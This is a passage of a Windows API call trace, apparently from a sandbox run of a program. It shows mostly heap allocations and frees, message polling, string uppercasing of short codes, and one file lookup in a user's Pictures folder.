RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0209.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0209.430] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0209.431] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0209.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0209.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0209.431] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0209.431] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0209.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0209.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0209.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0209.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0209.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0209.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.434] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0209.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0209.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.436] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/cwsPQYJwproUEWJ.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef243d20, ftCreationTime.dwHighDateTime=0x1d5d294, ftLastAccessTime.dwLowDateTime=0x490f7b20, ftLastAccessTime.dwHighDateTime=0x1d5ceed, ftLastWriteTime.dwLowDateTime=0x490f7b20, ftLastWriteTime.dwHighDateTime=0x1d5ceed, nFileSizeHigh=0x0, nFileSizeLow=0x12289, dwReserved0=0x0, dwReserved1=0x0, cFileName="cwsPQYJwproUEWJ.jpg", cAlternateFileName="CWSPQY~1.JPG")) returned 0x9e1bf8 [0209.436] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0209.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0209.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.436] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0209.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0209.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0209.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0209.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0209.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.437] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.438] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.438] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.438] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.438] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0209.438] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.438] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.438] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.438] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.439] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0209.439] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, 